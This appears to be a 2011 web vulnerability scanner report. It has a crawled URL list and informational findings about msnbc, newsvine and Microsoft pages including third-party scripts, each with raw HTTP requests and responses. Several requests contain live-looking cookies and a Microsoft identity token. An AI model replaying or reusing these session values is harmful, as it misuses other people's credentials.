http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia
http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/
http://www.msnbc.redacted/id/41324874/ns/us_news-weird_news
http://www.msnbc.redacted/id/41324874/ns/us_news-weird_news/
http://www.msnbc.redacted/id/41324877/ns/world_news-europe
http://www.msnbc.redacted/id/41324877/ns/world_news-europe/
http://www.msnbc.redacted/id/41326456/ns/business-media_biz/
http://www.msnbc.redacted/id/41326559/ns/local_news-dallasfort_worth_tx/
http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia
http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia/
http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/
http://www.msnbc.redacted/id/41327694/ns/us_news/
http://www.msnbc.redacted/id/41327817/ns/world_news-mideastn_africa/
http://www.msnbc.redacted/id/41327817/ns/world_news-mideastn_africa/
http://www.msnbc.redacted/id/41327924/ns/world_news-europe/
http://www.msnbc.redacted/id/41328059/ns/us_news/
http://www.msnbc.redacted/id/41328834/ns/world_news-europe/
http://www.msnbc.redacted/id/41329947/ns/us_news-crime_and_courts/
http://www.msnbc.redacted/id/41330515/ns/us_news-life/
http://www.msnbc.redacted/id/41330876/ns/world_news-europe/
http://www.msnbc.redacted/id/8004316/
http://www.myhomeredacted/
http://www.nasawatch.com/
http://www.neudesicmediagroup.com/Advertising.aspx
http://www.newsvine.com/
http://www.newsvine.com/_tools/user/login
https://www.newsvine.com/
https://www.newsvine.com/_nv/accounts/login
https://www.newsvine.com/_nv/accounts/msnbc/newsletters
https://www.newsvine.com/_nv/accounts/register
http://www.opensource.org/licenses/gpl-license.php
http://www.opensource.org/licenses/mit-license.php
http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.outofthecradle.net/
http://www.pcmag.com/&|http:/www.pcmag.com/reviews|http:/www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944
http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944
http://www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944
http://www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944
http://www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944
http://www.pcmag.com/reviews|http:/www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944
http://www.polls.newsvine.com/
http://www.polls.newsvine.com/_labs/archive
http://www.polls.newsvine.com/_nv/cms/backyard/greenhouse
http://www.polls.newsvine.com/_nv/cms/backyard/tools
http://www.polls.newsvine.com/_nv/cms/help/faq
http://www.polls.newsvine.com/_nv/cms/info/codeOfHonor
http://www.polls.newsvine.com/_nv/cms/info/companyInfo
http://www.polls.newsvine.com/_nv/cms/info/contact
http://www.polls.newsvine.com/_nv/cms/info/copyrightPolicy
http://www.polls.newsvine.com/_nv/cms/info/jobs
http://www.polls.newsvine.com/_nv/cms/info/privacyPolicy
http://www.polls.newsvine.com/_nv/cms/info/userAgreement
http://www.polls.newsvine.com/_nv/cms/welcome
http://www.polls.newsvine.com/_vine/a
http://www.polls.newsvine.com/_vine/search
http://www.polls.newsvine.com/arts
http://www.polls.newsvine.com/business
http://www.polls.newsvine.com/education
http://www.polls.newsvine.com/entertainment
http://www.polls.newsvine.com/environment
http://www.polls.newsvine.com/fashion
http://www.polls.newsvine.com/health
http://www.polls.newsvine.com/history
http://www.polls.newsvine.com/home-garden
http://www.polls.newsvine.com/not-news
http://www.polls.newsvine.com/odd-news
http://www.polls.newsvine.com/politics
http://www.polls.newsvine.com/religion
http://www.polls.newsvine.com/science
http://www.polls.newsvine.com/sports
http://www.polls.newsvine.com/technology
http://www.polls.newsvine.com/travel
http://www.polls.newsvine.com/us-news
http://www.polls.newsvine.com/world-news
http://www.popsci.com/
http://www.popularmechanics.com/
http://www.reuters.com/
http://www.sciencenews.org/
http://www.scientificamerican.com/blog/observations/
http://www.scientificamerican.com/errors/404.cfm
http://www.scout.com/
http://www.scout.com/3/college-links.html
http://www.scout.com/3/company.html
http://www.scout.com/3/fair-use.html
http://www.scout.com/3/jobs.html
http://www.scout.com/3/privacy-policy.html
http://www.scout.com/3/recruiting-links.html
http://www.scout.com/3/security-information.html
http://www.scout.com/3/terms-of-service.html
http://www.scout.com/a.z
http://www.scout.com/search.aspx
http://www.scout.com/widgets/
http://www.signonsandiego.com/news/blogs/science-quest/
http://www.silverlight.net/
http://www.silverlight.net/adchain.html
http://www.silverlight.net/community/
http://www.silverlight.net/community/blogarchive/silverlight/1/
http://www.silverlight.net/community/recognition/
http://www.silverlight.net/community/recognition/halloffame.aspx
http://www.silverlight.net/community/samples/featured/telerik-facedeck/
http://www.silverlight.net/community/samples/silverlight-samples/
http://www.silverlight.net/community/samples/silverlight-samples/animated-note-control-37395/
http://www.silverlight.net/community/samples/silverlight-samples/babysmash7-wp7-app-37425/
http://www.silverlight.net/community/samples/silverlight-samples/childwindow-effects-37469/
http://www.silverlight.net/community/samples/silverlight-samples/fill-background-with-patterns--texture-37396/
http://www.silverlight.net/community/samples/silverlight-samples/infragistics-xamgrid-37452/
http://www.silverlight.net/community/samples/silverlight-samples/rated/
http://www.silverlight.net/community/samples/silverlight-samples/simple-but-cool-silverlight-messageboxes-37444/
http://www.silverlight.net/community/samples/upload/
http://www.silverlight.net/contact.aspx
http://www.silverlight.net/getstarted/
http://www.silverlight.net/getstarted/devices/details.aspx
http://www.silverlight.net/getstarted/devices/symbian/
http://www.silverlight.net/getstarted/devices/windows-phone/
http://www.silverlight.net/getstarted/overview.aspx
http://www.silverlight.net/learn/
http://www.silverlight.net/learn/books/
http://www.silverlight.net/learn/dynamic-languages/
http://www.silverlight.net/learn/handsonlabs/
http://www.silverlight.net/learn/international/
http://www.silverlight.net/learn/pivotviewer/
http://www.silverlight.net/learn/quickstarts/
http://www.silverlight.net/learn/tutorials/jesse-liberty/general-tutorials/
http://www.silverlight.net/learn/tutorials/silverlight-4/
http://www.silverlight.net/learn/tutorials/silverlight-4/advanced-silverlight-out-of-browser-introduction/
http://www.silverlight.net/learn/tutorials/silverlight-4/aspnet-and-silverlight/
http://www.silverlight.net/learn/tutorials/silverlight-4/using-the-mvvm-pattern-in-silverlight-applications/
http://www.silverlight.net/learn/tutorials/silverlight-4/using-wcf-ria-services/
http://www.silverlight.net/learn/tutorials/windows-phone/
http://www.silverlight.net/learn/videos/all/build-your-first-desktop-ria-application-with-silverlight/
http://www.silverlight.net/learn/videos/all/build-your-first-silverlight-web-application/
http://www.silverlight.net/learn/videos/expression/
http://www.silverlight.net/learn/videos/indonesian-videos/
http://www.silverlight.net/learn/videos/japanese-videos/
http://www.silverlight.net/learn/videos/lyndacom-silverlight-essential-training/
http://www.silverlight.net/learn/videos/silverlight-4-videos/
http://www.silverlight.net/learn/videos/silverlight-media-framework/
http://www.silverlight.net/learn/videos/silverlight-videos/
http://www.silverlight.net/learn/videos/spanish-videos/
http://www.silverlight.net/privacy.aspx
http://www.silverlight.net/showcase/
http://www.silverlight.net/termsofuse.aspx
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282444/
http://www.space.com/
http://www.spacedaily.com/
http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.thespacereview.com/
http://www.theworkbuzz.com/employment-trends/video-interviews/
http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/
http://www.ticketcity.com/
http://www.tigerdirect.com/applications/SearchTools/item-details.asp
http://www.transterrestrial.com/
http://www.unica.com/
http://www.unmannedspaceflight.com/
http://www.walmart.com/cp/Electronics/3944
http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944
http://www.youtube.com/embed/CKZzn00w01M
http://www.youtube.com/embed/mm8byzo8zWE
http://www.zacks.com/
http://www.zacks.com/
http://www.zacks.com/
http://www.zacks.com/

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

23.1. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=36872389&AN=1895959499&PG=NBCMSN&ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

23.2. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3382.no_url_specifiedOX2487/B5076164.5

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

23.3. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.MSN/B5123509.8

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adscgen/st.php?survey_num=852149&site=58143061&code=39992639&randnum=4563724
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

23.4. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.MSN/B5123509.8

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adscgen/st.php?survey_num=852149&site=58143061&code=40142779&randnum=5845715
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

23.5. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.MSN/B5123509.8

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adscgen/st.php?survey_num=852149&site=58143061&code=40142779&randnum=6553387
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

23.6. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.7

Issue detail

The response dynamically includes the following scripts from other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401349
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5219
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 17:24:45 GMT
Expires: Sun, 30 Jan 2011 17:24:45 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401349&migRandom=4564506&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401349"></script>
...[SNIP]...

23.7. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.7

Issue detail

The response dynamically includes the following scripts from other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5220
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:29:44 GMT
Expires: Sun, 30 Jan 2011 01:29:44 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=5982434&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740"></script>
...[SNIP]...

23.8. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3973.MSN/B4412732.159

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

23.9. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.msn/B2087123.383

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

23.10. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

23.11. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

23.12. http://alex-johnson.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://alex-johnson.newsvine.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET / HTTP/1.1
Host: alex-johnson.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:50:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=966b66f7de9fa4522d803727a0791211; expires=Sat, 25-Jan-2031 17:50:07 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 66719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.13. http://analytics.live.com/Sync.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.live.com
Path:	/Sync.html

Issue detail

The response dynamically includes the following script from another domain:

http://analytics.atdmt.com/Scripts/wlHelper.js?i=MUID

Request

Response

23.14. http://analytics.microsoft.com/Sync.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.microsoft.com
Path:	/Sync.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://analytics.atdmt.com/Scripts/wlHelper.js?i=MUID
http://analytics.live.com/Scripts/wlHelper.js?i=ANID

Request

GET /Sync.html HTTP/1.1
Host: analytics.microsoft.com
Proxy-Connection: keep-alive
Referer: http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js'
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; 